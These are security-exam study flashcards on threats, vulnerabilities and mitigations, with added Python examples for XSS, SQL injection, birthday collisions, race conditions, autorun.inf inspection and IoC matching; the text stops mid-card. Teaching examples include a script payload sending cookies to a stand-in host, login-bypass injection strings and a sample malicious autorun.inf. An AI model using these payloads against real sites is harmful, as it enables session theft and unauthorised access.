Chapter 2: Threats, Vulnerabilities and Mitigations Flashcards

1
Q

Logic Bomb

A

A piece of malicious code intentionally inserted into an otherwise legitimate program that lies dormant and executes its payload (deleting files, corrupting data, disabling a system) only when a specific condition is met, such as a date, an event, or the absence of an expected trigger. Often planted by an insider who has access to the code.

2
Q

Trojan Horse

A

A type of malware that disguises itself as a legitimate or useful program to trick users into downloading and running it. Unlike a worm it does not self-replicate; it depends on the user executing it, and it typically installs a backdoor or drops further malware.

3
Q

Rootkit

A

A type of malware designed to gain and keep privileged (root or administrator) access to a computer while hiding its own presence, and that of other malware, from the operating system and security tools, typically by hooking or replacing kernel, driver, firmware, or boot components. Because it subverts the layer that security software relies on, detection usually needs an out-of-band check: an offline scan, booting from trusted media, or measured/secure boot.

4
Q

Worm

A

A type of malicious software (malware) that self-replicates and spreads rapidly across a network without any user interaction, typically by exploiting a vulnerability or weak credentials in a network-exposed service. The spread itself can saturate bandwidth and crash systems even before any payload runs.

5
Q

WPA3

A
  • Wi‐Fi Protected Access 3 (WPA3) is the most modern and most secure Wi‐Fi security option.
  • WPA3‐Personal replaces WPA2’s Pre‐Shared Key (PSK) four‐way handshake with Simultaneous Authentication of Equals (SAE), a password‐authenticated key exchange. A captured SAE handshake cannot be brute‐forced offline against a wordlist, so an attacker is limited to online guessing (one guess per attempt against the access point), and each session key has forward secrecy. It still relies on a shared passphrase, so a weak passphrase is still weak, just harder to attack.
  • Wi‐Fi Enhanced Open (OWE), introduced alongside WPA3, gives each client on an open, password‐less network its own encrypted session, so users of the same hotspot cannot sniff one another’s traffic; this is what “encrypts each device’s data individually” refers to.
  • WPA3‐Enterprise keeps 802.1X/EAP authentication and adds an optional 192‐bit security mode.

https://www.securew2.com/wp-content/uploads/2023/08/Design-the-WPA2-Vs-802.1-X-Image.png

6
Q

WPA2

A
  • WPA2 (2004) replaced WPA and WEP. Its weaknesses are mostly in how it is deployed: a WPA2‐Personal four‐way handshake can be captured and the passphrase brute‐forced offline; an access point run in a backward‐compatible “mixed mode” that still accepts WPA/TKIP or WEP clients inherits those older protocols’ weaknesses; and the optional WPS PIN feature can be brute‐forced. The 2017 KRACK key‐reinstallation attack hit the protocol itself and required client patches.
  • Uses the Advanced Encryption Standard (AES) in CCMP mode for confidentiality and integrity, replacing WPA’s TKIP (based on RC4). AES is a NIST standard approved by the US government for protecting classified information.

https://www.securew2.com/wp-content/uploads/2023/08/Design-the-WPA2-Vs-802.1-X-Image.png

7
Q

Cross-site Scripting

A

Cross‐site scripting (XSS) is a web application vulnerability in which an attacker injects script (usually JavaScript) into content that the site later serves to other users, for example through a comment field, a profile name, or a URL parameter reflected into the page. Because the browser runs the script in the context of the trusted site, it can steal session cookies or tokens, perform actions as the victim, or rewrite the page. Variants: stored (persisted on the server), reflected (echoed from the request), and DOM‐based (client‐side script inserts untrusted data into the DOM). The primary mitigations are context‐aware output encoding, input validation, and a Content Security Policy.
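
As an added example (not part of the original flashcards), the stored-XSS case in code: a vulnerable renderer that concatenates a user comment into HTML beside the fixed version that encodes for the HTML-body context, plus an attribute-context renderer to show that encoding depends on where the data lands. The comment text and the evil.example URL are constructed for the example.

```python
import html

# Constructed sample input (not from the original page): a "comment" an attacker
# submits to a site that later shows it to other users (stored XSS).
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into the HTML body.
    Any browser that renders the result runs the attacker's script inside the
    trusted site's origin, where it can read cookies, tokens and page content."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Mitigated: HTML-encode untrusted text for the HTML-body context.
    '<' becomes '&lt;', so the browser displays the tag instead of executing it."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_attribute_safe(value: str) -> str:
    """Encoding is context specific. Inside a quoted attribute the quote
    character must be encoded too (quote=True); otherwise an input such as
    '" onmouseover="...' would close the attribute and add an event handler."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def contains_script_tag(rendered_html: str) -> bool:
    """Crude check used only to compare the two renderers above:
    a literal <script tag in the output means the browser will execute it."""
    return "<script" in rendered_html.lower()
```

html.escape covers the HTML-body and quoted-attribute contexts only; data placed inside a script block, a URL, or a CSS value needs that context's own encoding, which is why template engines with auto-escaping and a Content Security Policy are the defaults rather than hand-written escaping.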

8
Q

SQL Injection

A

A common attack vector in which untrusted input is placed directly into a SQL statement sent to the backend database, so that characters in the input (a quote, a comment marker, a UNION) change the statement’s meaning. Results range from bypassing a login check and reading data that was never meant to be displayed to modifying or deleting data and, on some databases, executing operating-system commands. The primary defence is parameterized queries (prepared statements), backed by input validation and a least-privilege database account.
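
As an added example (not from the original flashcards), a login check written both ways against a constructed in-memory SQLite table: the string-built query falls to a tautology payload and to a comment payload, while the parameterized query treats the same input as plain data. The users, passwords, and payloads are all made up for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample database (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "letmein")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: user input is pasted into the SQL text, so a quote in the
    input ends the string literal and the rest of the input becomes SQL."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}' "
        "ORDER BY id"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Fixed: placeholders keep the SQL structure fixed; the driver passes the
    values separately, so they can only ever be compared as data."""
    query = (
        "SELECT username FROM users "
        "WHERE username = ? AND password = ? ORDER BY id"
    )
    return [row[0] for row in conn.execute(query, (username, password))]


# Classic tautology payload for the password field. The WHERE clause becomes
#   username = 'alice' AND password = '' OR '1'='1'
# and, since AND binds tighter than OR, it is true for every row.
TAUTOLOGY = "' OR '1'='1"

# Comment payload for the username field: everything after -- is ignored,
# so the password comparison disappears from the statement entirely.
COMMENT_BYPASS = "alice'--"
```

Note that the fixed version still stores passwords in clear text purely to keep the example short; a real login table stores salted password hashes, which limits what a successful injection can read.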

9
Q

On-path attack

A

A cyberattack (formerly called a man-in-the-middle attack) in which the attacker positions themselves between two communicating parties, secretly intercepting and possibly modifying the traffic while each side believes it is talking directly to the other. Common ways to get on-path: ARP spoofing, a rogue Wi-Fi access point, DNS spoofing, or BGP hijacking. Mitigations: TLS with proper certificate validation, HSTS, mutual authentication, and a VPN on untrusted networks.

10
Q

What is a motivation for a Nation-state actor?

A

Nation‐state actors are typically advanced persistent threats (APTs), and their motivations commonly include espionage, data exfiltration, disruption or chaos, and war. Financial gain is more commonly associated with organized crime, blackmail with insider threats, and ideological or ethical motives with hacktivists.

11
Q

Spear Phishing

A

A type of phishing attack aimed at a specific individual, group, or organization, using details about the target (name, role, colleagues, current projects, suppliers) to make the lure convincing. Spear phishing aimed at executives is called whaling.

12
Q

Bloatware

A

Unwanted, often pre-installed software shipped by the manufacturer or vendor on a new computer or device, or bundled with an application (trial software, vendor utilities, browser toolbars). Beyond wasting resources it enlarges the attack surface, since it is rarely updated and sometimes runs with elevated privileges; removing or disabling it is part of baseline hardening.

13
Q

Vishing

A

Voice phishing: a social engineering attack conducted over the phone or VoIP, often with a spoofed caller ID, in which the attacker poses as a bank, help desk, or government agency to trick people into giving away sensitive information or approving a transaction.

14
Q

Smishing

A

SMS phishing: a type of cybercrime that uses deceptive text messages (parcel delivery notices, bank alerts, one-time-code requests) to trick people into sharing sensitive information, opening a malicious link, or performing actions that compromise their security.

15
Q

Pretexting

A

creating a fake scenario to trick a victim into giving away sensitive information.

16
Q

Business email compromise (BEC)

A

A targeted scam in which the attacker impersonates, or takes over, a trusted business email account (an executive’s, a supplier’s, a lawyer’s) to trick an employee into sending money (a fraudulent wire transfer, changed bank details on an invoice) or sharing sensitive information. Usually no malware is involved, so technical controls must be backed by out-of-band verification of payment and data requests.

17
Q

Typo squatting

A

A form of cybersquatting (registering domain names that trade on someone else’s brand or trademark) that targets Internet users who mistype a website address into their browser, for example exampel.com instead of example.com, or the right name under a different top-level domain. The look-alike site may serve phishing pages, malware, or ads. The same trick is used against software package registries by publishing libraries under misspelled names.

18
Q

HIDS

A

A Host-based Intrusion Detection System: software installed on an individual host that monitors that host’s own activity (log entries, file integrity, running processes, registry keys, and the network traffic the host sends and receives) for signs of compromise and raises alerts. It detects and reports; unlike a HIPS it does not block.

19
Q

HIPS

A

A Host-based Intrusion Prevention System: a security tool that monitors activity on a computer system like a HIDS, but also acts on what it sees, blocking the suspicious connection, process, or file change in real time.

21
Q

Least Privilege Access

A

A security principle, and the access-control strategy built on it, that gives each user, process, and system only the permissions needed to perform its job, for only as long as they are needed. It limits the damage a compromised account or exploited process can do.

21
Q

Watering Hole Attack

A

A cyberattack in which the attacker compromises a legitimate website that the target group is known to visit and plants malware or an exploit kit there, so that members of the target group are infected when they browse to it. It is used when the target itself is hard to phish directly; the name comes from predators waiting at a watering hole.

22
Q

RDP (Remote Desktop Protocol)

A

Microsoft’s protocol (default TCP port 3389) that lets a user open an interactive desktop session on a Windows computer from another device. RDP exposed to the internet is a frequent initial-access route for ransomware groups, via password spraying, credential stuffing, and unpatched RDP vulnerabilities; keep it off the internet (behind a VPN or gateway), require Network Level Authentication and multi-factor authentication, and lock accounts out after repeated failures.

23
Q

NTLM (NT LAN Manager)

A

A Microsoft challenge-response authentication protocol suite (LM, NTLMv1, NTLMv2) that authenticates users and computers in a Windows network, kept mainly for backward compatibility now that Kerberos is the default in Active Directory domains. Because a client proves knowledge of the password hash rather than the password, stolen hashes can be replayed directly (pass-the-hash), authentication exchanges can be forwarded to another server (NTLM relay), and LM/NTLMv1 responses are trivially cracked offline. Prefer Kerberos, allow NTLMv2 only, enable SMB signing, and restrict or audit NTLM use.

24
Q

Birthday attack

A

A cryptographic attack that uses the birthday problem from probability theory to find collisions in a hash function: two different inputs with the same digest. Because the attacker only needs any two inputs to collide rather than a match for one specific target, the work is about 2^(n/2) for an n-bit hash, not 2^n. That is why a 128-bit hash such as MD5 offers at most 64 bits of collision resistance, and why digital signatures need long, collision-resistant digests.
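
As an added example (not from the original flashcards), the birthday bound worked through and then demonstrated: the collision probability formula, the expected number of trials for an n-bit hash, and a generic birthday attack that finds two distinct messages with the same digest. SHA-256 truncated to 24 bits stands in for a weak hash so the search finishes instantly; the message format is an assumption of the example.

```python
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """SHA-256 truncated to `bits` bits. A deliberately tiny hash stands in for a
    real one so the collision search below finishes instantly; the same
    sqrt(N) behaviour applies to a full-size digest, just with N = 2**256."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def collision_probability(n_items: int, space_size: int) -> float:
    """Birthday bound: P(at least one collision among n_items random values
    drawn from space_size possibilities) ~ 1 - exp(-n^2 / (2 * space_size)).
    With 23 people and 365 birthdays this is already above 50%."""
    return 1.0 - math.exp(-(n_items ** 2) / (2.0 * space_size))


def expected_trials(bits: int) -> float:
    """Expected number of hashes before the first collision in a bits-bit hash:
    sqrt(pi/2 * 2^bits), i.e. about 2^(bits/2). This is why an n-bit hash
    offers only n/2 bits of collision resistance."""
    return math.sqrt(math.pi / 2.0 * (2 ** bits))


def find_collision(bits: int):
    """Generic birthday attack: hash distinct inputs and remember every digest
    until one repeats. Returns (msg1, msg2, trials) with msg1 != msg2 but equal
    truncated hashes. Inputs are deterministic counters, so the result is
    repeatable; the memory cost is the same order as the trial count."""
    seen = {}
    trials = 0
    while True:
        msg = f"msg-{trials}".encode()
        trials += 1
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, trials
        seen[h] = msg
```

For the 24-bit case expected_trials returns about 5,100, which is roughly 2^12.3 rather than the 2^24 a preimage search would need; the same arithmetic says a 64-bit digest falls to about 2^32 hashes, a quantity a laptop computes in minutes.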

25
Q

What is the difference between a misinformation campaign, pretexting campaign, impersonation campaign and a disinformation campaign?

A
  • Misinformation Campaign: Spread of false or inaccurate information without the intent to deceive. The person or entity sharing it may believe it to be true.
    Example: Sharing an outdated or incorrect statistic by mistake.
  • Pretexting Campaign: A social engineering tactic where an attacker creates a fabricated scenario (pretext) to trick a target into revealing sensitive information.
    Example: Pretending to be an IT technician to get a user’s login credentials.
  • Impersonation Campaign: A tactic where an attacker assumes the identity of a trusted individual or entity to manipulate or deceive someone for malicious purposes.
    Example: Posing as a CEO via email to instruct an employee to transfer funds (CEO fraud).
  • Disinformation Campaign: Deliberate dissemination of false information with the intention of misleading or causing harm.
    Example: Spreading false rumors to discredit a political opponent during an election.
    In short:

Misinformation = Unintentional false info.
Pretexting = Fabricated story to obtain info.
Impersonation = Posing as someone else to deceive.
Disinformation = Intentional spread of false info to deceive.

26
Q

What threat vector is most affected by how Windows handles autorun.inf files?

A

The threat vector mostly impacted by how Windows handles autorun.inf files is removable media (such as USB drives or external hard drives).

Here’s why:

autorun.inf is a small configuration file that Windows reads from the root of a removable or optical drive when it is inserted. It tells Windows which program to launch (the open= or shellexecute= keys), which icon and label to show, and which Explorer context-menu verbs to offer (shell\...\command= keys).
Attack vector: Malware writes its own autorun.inf next to a hidden executable on every USB drive it sees, so that plugging the drive into the next machine launches the malware. This made removable media a major worm-propagation channel (Conficker, for example, spread this way).
Impact:

Malware propagation: Code runs on insertion with no user interaction beyond plugging in the drive, so one infected stick carries the malware between machines and even between otherwise isolated networks.
Data theft: The launched malware can copy files and credentials from each host it reaches, and back onto the drive in air-gapped environments.
System compromise: The code runs as the logged-on user, so whatever that user can do the malware can do, often leading to a full compromise.
In response, Microsoft disabled AutoRun for removable media other than CD/DVD in Windows 7 and pushed the same change to XP and Vista as an update: AutoPlay still shows a prompt, but it no longer executes the program named in autorun.inf. Malware adapted by tricking the user through the AutoPlay dialog (a fake “Open folder to view files” entry built with the action= and icon= keys) and by shortcut (LNK) tricks. The remaining defence is device control: block or allow-list USB storage and disable AutoPlay entirely by policy.
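
As an added example (not from the original flashcards), a small inspector for autorun.inf files of the kind an incident responder runs over a suspect USB drive: it parses the [autorun] section and flags the directives worms relied on (a program to launch on insertion, an Explorer verb pointing at an executable, and AutoPlay text mimicking the built-in “Open folder” entry). The two sample files, including the RECYCLER\ise32.exe path, are constructed for the example.

```python
import configparser

# Constructed sample autorun.inf (not from the original page): the kind a USB
# worm drops next to a hidden executable so that inserting the drive runs it.
MALICIOUS_AUTORUN_INF = """\
[autorun]
open=RECYCLER\\ise32.exe
shellexecute=RECYCLER\\ise32.exe
shell\\open\\command=RECYCLER\\ise32.exe
icon=shell32.dll,4
action=Open folder to view files
"""

# Constructed benign example: only an icon and a volume label, no launch keys.
BENIGN_AUTORUN_INF = """\
[autorun]
icon=setup.exe,0
label=Vendor Driver Disc
"""

# Keys that name a program Windows would launch on insertion (pre-Windows 7
# AutoRun) or when the AutoPlay / Explorer default action is chosen.
LAUNCH_KEYS = {"open", "shellexecute"}


def analyze_autorun(text: str) -> dict:
    """Parse an autorun.inf and report the directives an attacker would use.
    interpolation=None keeps configparser from choking on %SystemRoot%-style
    paths; strict=False tolerates the duplicate keys sloppy malware emits."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    if "autorun" not in parser:
        return {"has_autorun_section": False, "findings": []}

    findings = []
    for key, value in parser["autorun"].items():   # keys are lower-cased by configparser
        if key in LAUNCH_KEYS:
            findings.append(f"{key}={value}: program launched automatically on insertion")
        elif key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(f"{key}={value}: Explorer context-menu verb points at an executable")
        elif key == "action" and "folder" in value.lower():
            findings.append(f"action={value}: AutoPlay text mimics the built-in 'Open folder' entry")
    return {"has_autorun_section": True, "findings": findings}
```

In practice the findings are paired with a check that the referenced executable exists on the drive (often in a hidden RECYCLER or System Volume Information folder) and with its hash, which is the IoC worth sharing.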

27
Q

What is the difference between a buffer overflow, a logic bomb, a race condition, and improper error handling, and how do they relate to multithreading?

A
  1. Buffer Overflow:
    Definition: Occurs when a program writes more data to a buffer (a fixed-size area of memory) than it can hold, overwriting adjacent memory. Classic in C and C++, where array bounds are not checked automatically.
    Impact: Crashes, memory corruption and, if the attacker controls the overwritten data (a saved return address or a function pointer), arbitrary code execution.
    Example: A service copying a network request into a fixed-size stack buffer with strcpy() without checking the request’s length.
  2. Logic Bomb:
    Definition: A malicious piece of code embedded in a program that stays dormant and triggers harmful actions (data deletion, system corruption) when specific conditions are met, such as a date, an event, or a missing trigger.
    Impact: A delayed attack that can damage systems or data long after the code was planted, often after the planter has left.
    Example: A programmer plants hidden code that deletes files if their employee ID disappears from the payroll system.
  3. Race Conditions:
    Definition: Occurs when two or more threads or processes access a shared resource concurrently and the outcome depends on the order in which they happen to run. Without proper synchronization (locks, atomic operations) the interleaving can produce wrong results. The security-relevant form is time-of-check to time-of-use (TOCTOU): a check is made, the resource changes, and then the stale check is acted on.
    Impact: Data corruption, lost updates, bypassed checks or privilege escalation, and behaviour that is hard to reproduce.
    Example: Two processes updating the same file at once so that one write overwrites the other; or a program that checks a file’s permissions and then opens it, while an attacker swaps in a symbolic link between the two steps.
  4. Improper Error Handling:
    Definition: Occurs when an application does not handle errors appropriately, either by revealing sensitive information or by failing to recover from an error condition securely (continuing in an inconsistent state, or failing open).
    Impact: Exposure of internals such as stack traces or database errors that help an attacker, or a system left vulnerable because errors are not properly managed.
    Example: A web application that displays a full database error message to the user, revealing internal details such as table names or the query text.
    Relation to multithreading: Race conditions are the one of the four that arises directly from multithreading (or multiprocessing): any read-modify-write on shared state that is not protected by a lock or an atomic operation can lose or interleave updates. Buffer overflows and improper error handling are not caused by threading, though concurrency can make them harder to reproduce; a logic bomb is deliberate code, not a concurrency defect.
    Summary:
    Buffer Overflow: Exceeds buffer capacity, potentially leading to memory corruption or code execution.
    Logic Bomb: Malicious code that triggers harmful actions when certain conditions are met.
    Race Conditions: Unpredictable behaviour due to improper synchronization of concurrent threads or processes.
    Improper Error Handling: Failure to securely handle and manage errors, possibly exposing sensitive information or leaving the system vulnerable.
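
As an added example (not from the original flashcards), the race condition of item 3 made visible with real threads: eight threads each increment a shared counter two thousand times, once with an unprotected read-modify-write and once inside a lock. The explicit time.sleep(0) between the read and the write is an assumption of the example, added only to widen the window so the lost updates show up reliably; the lock-protected version always reaches the expected total.

```python
import threading
import time

N_THREADS = 8
ITERATIONS = 2000


def expected_total() -> int:
    """Every thread increments ITERATIONS times, so this is the correct final count."""
    return N_THREADS * ITERATIONS


def _run_in_threads(worker) -> None:
    threads = [threading.Thread(target=worker) for _ in range(N_THREADS)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def run_unsynchronized() -> int:
    """Race condition: each iteration is a read -> (yield) -> write on a shared
    counter with no lock. time.sleep(0) lets other threads run between the read
    and the write, so two threads read the same stale value and one increment
    is lost. The final count is almost always below expected_total()."""
    state = {"count": 0}

    def worker():
        for _ in range(ITERATIONS):
            current = state["count"]        # time of check
            time.sleep(0)                   # other threads run here
            state["count"] = current + 1    # time of use: may clobber a newer value

    _run_in_threads(worker)
    return state["count"]


def run_synchronized() -> int:
    """Fix: the whole read-modify-write is one critical section guarded by a
    lock, so no other thread can interleave between the read and the write.
    An atomic increment would achieve the same thing."""
    state = {"count": 0}
    lock = threading.Lock()

    def worker():
        for _ in range(ITERATIONS):
            with lock:
                current = state["count"]
                time.sleep(0)
                state["count"] = current + 1

    _run_in_threads(worker)
    return state["count"]
```

The same shape (check, gap, act) is the TOCTOU bug from the definition; in a file-system version the “gap” is between a permission check and the open(), and the fix is likewise to make the two steps indivisible, for example by opening the file first and checking the open descriptor.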
28
Q

What is a WinBuff attack?

A

“WinBuff” is not a standard industry term. It is most plausibly shorthand for a buffer overflow attack on a Windows system (“Win” plus “buff”), so treat it as the buffer overflow concept. A buffer overflow happens when a program writes more data into a fixed-size area of memory than it can hold and the excess spills into adjacent memory; the result ranges from a crash to an attacker running code of their choosing.

Here’s how a buffer overflow attack generally works:

The attacker supplies input (a network packet, a file, a form field) that is longer than the buffer the program copies it into, and the program does not check the length.
The excess data “overflows” into adjacent memory, overwriting whatever is stored there: other variables, a saved return address on the stack, or heap management data.
If the overwritten data is control data (a return address or function pointer), the attacker chooses where execution continues: into injected shellcode or, where DEP/NX blocks that, into a chain of existing code fragments (return-oriented programming). Otherwise the program usually just crashes, which is a denial of service (DoS).
Defences on Windows include DEP/NX, ASLR, stack cookies (/GS), Control Flow Guard, and writing the code in a memory-safe language or with bounds-checked APIs.

29
Q

what is a DLL injection?

A

DLL injection is one of a family of attacks that abuse how Windows loads Dynamic Link Library (DLL) files. The common types:

DLL Injection: The attacker forces a running process to load a DLL of their choosing, typically by writing the DLL’s path into the target process’s memory and starting a remote thread that calls LoadLibrary, or via AppInit_DLLs, Windows hooks, or debugger APIs. The code then runs inside a trusted process, inheriting its privileges and hiding behind its name, which is why the technique is popular for evading detection and for stealing credentials from processes such as LSASS.

DLL Hijacking: The attacker places a malicious DLL in a directory where a legitimate application looks for a library before it reaches the real one. If the application loads the attacker’s DLL, the code runs with the application’s privileges. This works when an application loads a DLL by bare name rather than full path, or asks for a DLL that does not exist at all (a “phantom” DLL).

Trojanized DLLs: A legitimate DLL file is modified or rebuilt to include a malicious payload; when an application loads it, the attacker’s code runs. The software-supply-chain variant is shipping the trojanized DLL inside a legitimate installer or update.

Search-Order Hijacking: The specific form of DLL hijacking that exploits the order in which Windows searches for a DLL (with SafeDllSearchMode enabled: the application’s directory, the system directories, the Windows directory, the current directory, then PATH). Placing a malicious DLL in an earlier, writable location wins over the real one in a later location.

Defences: load DLLs by full path and call SetDefaultDllDirectories, keep SafeDllSearchMode enabled, keep application directories non-writable by ordinary users, sign DLLs and verify signatures, and monitor for remote thread creation and unexpected module loads (EDR).

30
Q

What is a Syringe attack?

A

“Syringe attack” is not a standard term. In practice “Syringe” is the name of a publicly released Windows utility for injecting DLLs or shellcode into a running process, so the phrase is best read as a process-injection attack (see DLL injection above): the attacker’s code is “injected” into a trusted, already-running process and runs with that process’s privileges, hidden behind its name. Some study material instead uses the syringe image for physically “injecting” malicious code into a machine, which is really the removable-media and physical-access threat vector:

USB Devices: A covertly inserted USB device, either a storage stick carrying malware or a device that presents itself as a keyboard and types commands, exploiting the operating system, its applications, or the user.

Hardware Manipulation: An attacker with physical access tampers with hardware or attaches devices (hardware keyloggers, rogue network taps) to gain access or run malicious software.

Physical Security Breaches: Any physical route to introducing malicious code, usually enabled by weak physical security controls.

Prevention Measures
Against process injection: endpoint detection and response (EDR) that flags cross-process memory writes and remote thread creation, application control, and running services with least privilege so that a hijacked process has little to offer.
Physical Security: Restrict unauthorized access to areas where computers and network equipment are housed.
USB Device Control: Policies that forbid unapproved USB devices, backed by endpoint controls that block unknown storage and unexpected device classes (a new “keyboard” appearing on a server is a red flag).
Regular Audits: Test both physical and digital controls periodically.
Awareness and proactive measures are crucial in mitigating these physical and injection-based threats.

31
Q

What is a memory traversal attack?

A

“Memory traversal” is not a standard term; it is usually used to mean a memory corruption (memory-safety) attack: exploiting bugs in how a program manages memory to read data it should not see or to hijack execution. Common building blocks:

Key Concepts
Buffer Overflow: The program writes more data to a buffer than it can hold, overwriting adjacent memory (a return address, a function pointer, a length field). The attacker controls what is written, and therefore where execution goes next.

Use After Free: The program keeps using a pointer after the memory it points to has been freed. If the attacker can get their own data allocated into the freed slot, the program operates on attacker-controlled data, often a fake object with attacker-chosen function pointers.

Heap Spraying: The attacker makes the program allocate many copies of a payload (typically a NOP sled followed by shellcode, or fake objects) across the heap, so that a corrupted pointer is likely to land on attacker-controlled data even when the exact address is unknown. It makes another bug reliably exploitable; it is not a vulnerability on its own.

Pointer Manipulation: Overwriting pointers or other control data (vtable entries, return addresses) redirects execution to the attacker’s code or, with DEP/NX in place, to chains of existing code fragments (return-oriented programming, ROP).

Goals of Memory Corruption Attacks
Data Exfiltration: Reading sensitive information from memory, such as passwords, session tokens, or encryption keys; out-of-bounds reads such as Heartbleed are this class.
Privilege Escalation: Exploiting a bug in a privileged component (kernel driver, SUID binary, system service) to run code with higher privileges.
Denial of Service: Crashing the program or corrupting its state, which is the most common outcome even when full code execution is not achieved.

Mitigations: memory-safe languages where possible; compiler and platform hardening (stack canaries, ASLR, DEP/NX, control-flow integrity); bounds-checked APIs; fuzzing and sanitizers (ASan) during testing.

32
Q

What are HIPS

A

HIPS (Host Intrusion Prevention System)
Definition: A security system installed on individual devices (hosts) to monitor and prevent malicious activities.
Function:
Detects suspicious behavior on the host.
Blocks potential threats in real-time.
Focuses on preventing attacks that have bypassed other layers of security (e.g., firewalls).
Example: It can prevent unauthorized changes to system files or registry settings.

33
Q

What are ACLs

A

ACLs (Access Control Lists)
Definition: Rules that define which users or systems are allowed or denied access to specific resources within a network or system.
Function:
Determines the level of access based on permissions. Network ACLs are evaluated top-down, the first matching rule wins, and an implicit deny sits at the end, so rule order matters.
Can be applied to network routers, firewalls, and file systems (an NTFS DACL is an ACL of access control entries on a file or folder).
Example: A firewall with an ACL might block traffic from certain IP addresses or allow only specific ports for communication.

34
Q

what are VLANs

A

VLANs (Virtual Local Area Networks)
Definition: A method to create logically separated networks within a physical network infrastructure.
Function:
Segments network traffic to isolate different departments or functions.
Enhances security by restricting access between VLANs: traffic between them has to pass through a router or firewall, where ACLs can be applied. A VLAN on its own is a segmentation tool rather than a security boundary; VLAN hopping (switch spoofing, double tagging) and misconfigured trunk ports can bypass it.
Example: A company might use VLANs to separate guest Wi-Fi traffic from internal corporate traffic.

35
Q

what are least privilege lists

A

Least Privilege Principle
Definition: A security principle that ensures users and systems have the minimum level of access required to perform their tasks.
Function:
Reduces risk by limiting access to only what is necessary.
Prevents users from accessing unnecessary or sensitive resources.
Example: An employee in accounting might only have access to the finance database and not the company’s internal IT systems.

36
Q

what are IoCs

A

Indicators of Compromise (IoCs) are pieces of forensic data or evidence that help identify potential malicious activity or security breaches in a system or network. Security teams match IoCs against logs, endpoint telemetry, and network traffic to detect and respond to threats early.

Common Types of IoCs:
File Hashes: Unique identifiers of files (MD5, SHA-1, SHA-256) that reveal whether a known malicious file is present. Easy to match, but brittle: recompiling or padding the file changes the hash.
IP Addresses: IPs that are associated with known malware or suspicious activity.
Domain Names: Malicious domains used by attackers to host malware or phishing schemes.
Email Addresses: Addresses used in phishing or spam campaigns.
Registry Changes: Unauthorized modifications to the system’s registry in Windows environments.
Malicious URLs: Links directing to harmful websites or files.
Unusual Network Traffic: Excessive or suspicious traffic patterns that could indicate data exfiltration or communication with command-and-control servers.
Behavioral Patterns: Abnormal system behaviors, such as unusual login times or failed login attempts.
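
As an added example (not from the original flashcards), the matching step in code: a small IoC set (IPs, domains, a file hash) is swept across a few log lines in proxy, DNS, and EDR formats, and every hit is reported with its line number. The IoC values, hosts, and log lines are all constructed for the example, using documentation address ranges and reserved names.

```python
import re

# Constructed IoC set (not from the original page; values are illustrative,
# using documentation IP ranges and reserved top-level domains).
IOC_IPS = {"203.0.113.45", "198.51.100.23"}
IOC_DOMAINS = {"update-check.example", "cdn-static.invalid"}
IOC_HASHES = {"4f2e9c1ab83d7e6f5a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f"}

# Constructed log lines in three formats: web proxy, DNS resolver, EDR file event.
SAMPLE_LOGS = [
    "2024-05-01T10:22:13Z proxy src=10.0.0.5 dst=203.0.113.45 host=update-check.example uri=/p.php status=200",
    "2024-05-01T10:22:14Z dns client=10.0.0.5 qname=www.intranet.example qtype=A rcode=NOERROR",
    "2024-05-01T10:23:02Z edr host=WS01 user=a.smith event=file_write path=C:\\Users\\a.smith\\Downloads\\invoice.pdf.exe sha256=4f2e9c1ab83d7e6f5a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f",
    "2024-05-01T10:25:40Z proxy src=10.0.0.7 dst=93.184.216.34 host=www.example.com uri=/ status=200",
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.IGNORECASE)
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def extract_observables(line: str) -> dict:
    """Pull candidate IPs, hashes and host names out of a free-text log line.
    Extraction is deliberately greedy (it also picks up 'invoice.pdf.exe' and
    'a.smith' as host-name candidates); the set intersection in match_iocs is
    what separates signal from noise."""
    return {
        "ip": set(IPV4_RE.findall(line)),
        "hash": {h.lower() for h in HASH_RE.findall(line)},
        "domain": {d.lower() for d in DOMAIN_RE.findall(line)},
    }


def match_iocs(lines) -> list:
    """Return (line_number, ioc_type, value) for every IoC seen in the logs."""
    hits = []
    for n, line in enumerate(lines, start=1):
        obs = extract_observables(line)
        for ip in sorted(obs["ip"] & IOC_IPS):
            hits.append((n, "ip", ip))
        for domain in sorted(obs["domain"] & IOC_DOMAINS):
            hits.append((n, "domain", domain))
        for digest in sorted(obs["hash"] & IOC_HASHES):
            hits.append((n, "hash", digest))
    return hits
```

A SIEM does the same intersection at scale; the first two hits on line 1 (destination IP and host name from the same request) are the kind of corroborating pair that turns a single indicator into a confident alert.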

37
Q

What are threat feeds

A

A threat feed is a continuous stream of real-time data about potential or active cyber threats. It provides information that can help organizations detect, prevent, and respond to security incidents by tracking known malicious activities, indicators of compromise (IoCs), and emerging attack vectors.

Key Features of Threat Feeds:
